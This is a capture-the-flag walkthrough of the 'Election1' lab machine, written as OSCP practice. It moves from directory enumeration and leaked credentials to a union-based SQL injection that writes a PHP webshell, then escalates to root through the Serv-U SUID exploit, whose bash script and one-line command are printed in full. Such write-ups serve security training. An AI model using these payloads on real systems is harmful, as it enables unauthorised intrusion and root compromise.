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Election1 | Aug 18, 2022


Who is the best candidate for the role?

Overall difficulty for me: Easy

Service Enumeration

As usual, scan the machine for open ports via rustscan!

Rustscan Result:

According to rustscan result, we have 2 ports are opened:

Ports Open Service
22 OpenSSH 7.6p1 Ubuntu
80 Apache httpd 2.4.29

HTTP on Port 80


Found a wordlist?? Let's brute forcing hidden directory via gobuster:

Found election directory:

It has a admin directory!

At this moment, I stuck at here for a while, and I decided to enumerate the /election directory via gobuster again but with different wordlist:

The card.php Looks interesting:

Bunch of binary. Let's convert binary to ascii via CyberChef:

Found a username and password!

Login to the /admin page:

We're admin in this page!

By enumerating manually, we can find that this page is using eLection Arctic Fox 2.0! Let's use searchsploit to find public exploit!

Searchsploit Result:

Looks like it suffers to SQL Injection!

Initial Foothold

After I rooted this machine, I found that there are 2 ways to gain initial foothold. In below I'll do the harder one, because why not try harder? :D


Yep, we're authenticated, and we should good to go!

Since I'm practicing the OSCP exam environment, instead of using SQLmap to gain initial foothold, I'll do it manually, as SQLmap is prohibited in OSCP exam.

  1. Capture the POST request:

Send to Repeater:

Confirm it's really vulnerable to SQL Injection:

Confirmed it's vulnerable to Union-based SQL Injection.

Let's test we can load a file or not via load_file in MySQL:

Yes!! Can we write into a file too?

Wow!! We can! We can now write a PHP webshell into /var/www/html!

Complete POST request:

aksi=fetch&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,"<?php system($_GET['cmd']) ?>" into outfile '/var/www/html/webshell.php'

We now have RCE (Remote Code Execution)!

Reverse Shell:

Since the target machine has nc installed, I'll use nc reverse shell from pentestmonkey, and URL encode it, as curl needs URL encoding:

Stable Shell via socat:


Privilege Escalation

www-data to love

Found 1 user: love

LinPEAS Result:

Found MySQL creds:

Found group writable /var/spool/cron/crontabs.

Found user love password:

Also found /usr/local/Serv-U/Serv-U has SUID bit set:

Switch User to love:

www-data/love to root

Serv-U SUID:

Found Serv-U File Server Version

Searchsploit Result:

Looks like we can leverage the Serv-U SUID binary to escalate to root!

if ! test -u "/usr/local/Serv-U/Serv-U"; then
  echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
  exit 1

echo "[*] Launching Serv-U ..."

/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'

if ! test -u "/tmp/sh"; then
  echo '[-] Failed'
  /bin/rm "/tmp/sh"
  exit 1

echo '[+] Success:'
/bin/ls -la /tmp/sh

echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p

In the above Bash exploit script, it has the following things:

  1. Line 1-4:
  1. Line 8: (Exploit part)
  1. Line 10-14:
  1. Line 16-20:

We can just copy the exploit part and manually launch the root shell!

Exploit command:

/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'

And we're root! :D




What we've learned:

  1. Web Crawler (robots.txt)
  2. Directory Enumeration
  3. Binary to ASCII
  4. MySQL Union-Based SQL Injection to RCE
  5. Privilege Escalation via Reused Password
  6. Privilege Escalation via Vulnerable Serv-U FTP Server